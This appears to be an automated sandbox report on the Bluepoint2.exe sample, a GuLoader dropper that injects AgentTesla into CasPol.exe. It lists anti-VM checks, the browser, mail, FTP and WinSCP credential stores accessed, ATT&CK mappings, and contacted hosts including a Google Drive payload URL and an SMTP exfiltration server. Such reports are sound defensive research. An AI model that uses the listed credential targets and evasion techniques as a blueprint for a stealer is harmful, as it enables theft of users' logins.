            Source: Bluepoint2.exe, 00000002.00000002.84108143586.0000000003451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Bluepoint2.exe, 00000002.00000002.84105475830.00000000007D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
            Source: Bluepoint2.exe, 00000002.00000002.84108143586.0000000003451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: Bluepoint2.exe, 00000002.00000002.84105943300.0000000000821000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE,
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5300Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5300Thread sleep time: -89610000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5300Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Bluepoint2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lang-1026.dllJump to dropped file
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_03361F61 rdtsc 2_2_03361F61
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 2987Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405D74
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0040699E FindFirstFileW,FindClose,2_2_0040699E
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeAPI call chain: ExitProcess graph end nodegraph_2-5555
            Source: C:\Users\user\Desktop\Bluepoint2.exeAPI call chain: ExitProcess graph end nodegraph_2-5775
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Bluepoint2.exe, 00000002.00000002.84105943300.0000000000821000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe,
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: Bluepoint2.exe, 00000002.00000002.84108143586.0000000003451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v2.0.50727\caspol.exewindir=\syswow64\iertutil.dll
            Source: CasPol.exe, 0000000B.00000002.88394157433.00000000011CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Bluepoint2.exe, 00000002.00000002.84108143586.0000000003451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Bluepoint2.exe, 00000002.00000002.84105475830.00000000007D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Bluepoint2.exe, 00000002.00000002.84108325427.0000000003529000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 0000000B.00000002.88395271547.0000000002FC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: CasPol.exe, 0000000B.00000002.88393681218.000000000116B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(n
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_713C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_713C1BFF
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_03361F61 rdtsc 2_2_03361F61
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336D7F8 mov eax, dword ptr fs:[00000030h]2_2_0336D7F8
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_03364FF9 mov eax, dword ptr fs:[00000030h]2_2_03364FF9
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336C431 mov eax, dword ptr fs:[00000030h]2_2_0336C431
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336BCEC mov eax, dword ptr fs:[00000030h]2_2_0336BCEC
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_033656E9 mov eax, dword ptr fs:[00000030h]2_2_033656E9
            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_20713470 LdrInitializeThunk,11_2_20713470
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Bluepoint2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 1000000Jump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Bluepoint2.exe" Jump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Bluepoint2.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4100, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: Yara matchFile source: 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4100, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4100, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		2
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium2
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		1
            Obfuscated Files or Information            		1
            Credentials in Registry            		117
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		Exfiltration Over Bluetooth21
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection            		1
            DLL Side-Loading            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Masquerading            		NTDS331
            Security Software Discovery            		Distributed Component Object Model1
            Clipboard Data            		Scheduled Transfer2
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Modify Registry            		LSA Secrets1
            Process Discovery            		SSHKeyloggingData Transfer Size Limits123
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common241
            Virtualization/Sandbox Evasion            		Cached Domain Credentials241
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 625508 Sample: Bluepoint2.exe Startdate: 12/05/2022 Architecture: WINDOWS Score: 100 24 mail.cpassociats.com 2->24 26 googlehosted.l.googleusercontent.com 2->26 28 3 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Yara detected GuLoader 2->40 42 3 other signatures 2->42 8 Bluepoint2.exe 22 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 22 C:\Users\user\AppData\Local\...\lang-1026.dll, PE32 8->22 dropped 44 Writes to foreign memory regions 8->44 46 Tries to detect Any.run 8->46 12 CasPol.exe 19 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 30 CE2020050617001.dnssw.net 81.25.126.48, 49783, 49786, 587 SWEB-ASServeiswebES Spain 12->30 32 drive.google.com 142.250.184.206, 443, 49781 GOOGLEUS United States 12->32 34 googlehosted.l.googleusercontent.com 142.250.185.161, 443, 49782 GOOGLEUS United States 12->34 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->48 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal ftp login credentials 12->52 58 2 other signatures 12->58 18 conhost.exe 12->18         started        54 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->54 56 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->56 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Bluepoint2.exe33%VirustotalBrowse
            Bluepoint2.exe42%ReversingLabsWin32.Trojan.GuLoader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\lang-1026.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\lang-1026.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class3.crl00%VirustotalBrowse
            http://www.certplus.com/CRL/class3.crl00%Avira URL Cloudsafe
            http://www.e-me.lv/repository00%Avira URL Cloudsafe
            http://www.acabogacia.org/doc00%Avira URL Cloudsafe
            http://crl.chambersign.org/chambersroot.crl00%Avira URL Cloudsafe
            http://ocsp.suscerte.gob.ve00%Avira URL Cloudsafe
            http://www.postsignum.cz/crl/psrootqca2.crl020%Avira URL Cloudsafe
            http://crl.dhimyotis.com/certignarootca.crl00%Avira URL Cloudsafe
            http://www.chambersign.org10%Avira URL Cloudsafe
            http://www.pkioverheid.nl/policies/root-policy00%Avira URL Cloudsafe
            http://www.suscerte.gob.ve/lcr0#0%Avira URL Cloudsafe
            http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%Avira URL Cloudsafe
            http://crl.ssc.lt/root-c/cacrl.crl00%Avira URL Cloudsafe
            http://postsignum.ttc.cz/crl/psrootqca2.crl00%Avira URL Cloudsafe
            http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%Avira URL Cloudsafe
            http://ca.disig.sk/ca/crl/ca_disig.crl00%Avira URL Cloudsafe
            http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class3P.crl00%Avira URL Cloudsafe
            http://www.suscerte.gob.ve/dpc00%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class2.crl00%Avira URL Cloudsafe
            http://www.disig.sk/ca/crl/ca_disig.crl00%Avira URL Cloudsafe
            http://www.defence.gov.au/pki00%Avira URL Cloudsafe
            https://COMTWSUUu1KHWCDXUrc.org0%Avira URL Cloudsafe
            http://www.sk.ee/cps/00%Avira URL Cloudsafe
            http://www.globaltrust.info0=0%Avira URL Cloudsafe
            http://cps.root-x1.letsencrypt.org00%Avira URL Cloudsafe
            http://policy.camerfirma.com00%Avira URL Cloudsafe
            http://www.ssc.lt/cps030%Avira URL Cloudsafe
            http://ocsp.pki.gva.es00%Avira URL Cloudsafe
            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%Avira URL Cloudsafe
            http://ca.mtin.es/mtin/ocsp00%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            http://crl.ssc.lt/root-b/cacrl.crl00%Avira URL Cloudsafe
            http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%Avira URL Cloudsafe
            http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%Avira URL Cloudsafe
            https://wwww.certigna.fr/autorites/0m0%Avira URL Cloudsafe
            http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://ca.mtin.es/mtin/DPCyPoliticas00%Avira URL Cloudsafe
            http://www.globaltrust.info00%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class3TS.crl00%Avira URL Cloudsafe
            http://ac.economia.gob.mx/last.crl0G0%Avira URL Cloudsafe
            https://www.catcert.net/verarrel0%Avira URL Cloudsafe
            http://www.disig.sk/ca0f0%Avira URL Cloudsafe
            http://www.sk.ee/juur/crl/00%Avira URL Cloudsafe
            http://crl.chambersign.org/chambersignroot.crl00%Avira URL Cloudsafe
            http://certs.oati.net/repository/OATICA2.crl00%Avira URL Cloudsafe
            http://crl.oces.trust2408.com/oces.crl00%Avira URL Cloudsafe
            http://www.quovadis.bm00%Avira URL Cloudsafe
            http://crl.ssc.lt/root-a/cacrl.crl00%Avira URL Cloudsafe
            http://certs.oaticerts.com/repository/OATICA2.crl0%Avira URL Cloudsafe
            http://www.trustdst.com/certificates/policy/ACES-index.html00%Avira URL Cloudsafe
            http://certs.oati.net/repository/OATICA2.crt00%Avira URL Cloudsafe
            http://www.accv.es000%Avira URL Cloudsafe
            http://www.pkioverheid.nl/policies/root-policy-G200%Avira URL Cloudsafe
            https://www.netlock.net/docs0%Avira URL Cloudsafe
            http://www.e-trust.be/CPS/QNcerts0%Avira URL Cloudsafe
            http://ocsp.ncdc.gov.sa00%Avira URL Cloudsafe
            http://fedir.comsign.co.il/crl/ComSignCA.crl00%Avira URL Cloudsafe
            http://XkBFAe.com0%Avira URL Cloudsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%Avira URL Cloudsafe
            http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%Avira URL Cloudsafe
            http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;0%Avira URL Cloudsafe
            https://repository.luxtrust.lu00%Avira URL Cloudsafe
            http://cps.chambersign.org/cps/chambersroot.html00%Avira URL Cloudsafe
            http://www.acabogacia.org00%Avira URL Cloudsafe
            http://www.uce.gub.uy/acrn/acrn.crl00%Avira URL Cloudsafe
            http://www.avast.com0/0%Avira URL Cloudsafe
            http://crl.securetrust.com/SGCA.crl00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            CE2020050617001.dnssw.net
            		81.25.126.48
            		truefalse
              		unknown
              drive.google.com
              		142.250.184.206
              		truefalse
                		high
                googlehosted.l.googleusercontent.com
                		142.250.185.161
                		truefalse
                  		high
                  doc-10-20-docs.googleusercontent.com
                  		unknown
                  		unknownfalse
                    		high
                    mail.cpassociats.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-10-20-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mltfd60qk512l24argm1l66nhg5fuhtt/1652377275000/13609515036127870368/*/1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT?e=downloadfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.certplus.com/CRL/class3.crl0CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.e-me.lv/repository0CasPol.exe, 0000000B.00000002.88426909748.000000002095B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.acabogacia.org/doc0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://doc-10-20-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mltfd60qCasPol.exe, 0000000B.00000003.84078480008.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88394157433.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84078083345.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88393681218.000000000116B000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://crl.chambersign.org/chambersroot.crl0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.suscerte.gob.ve0CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
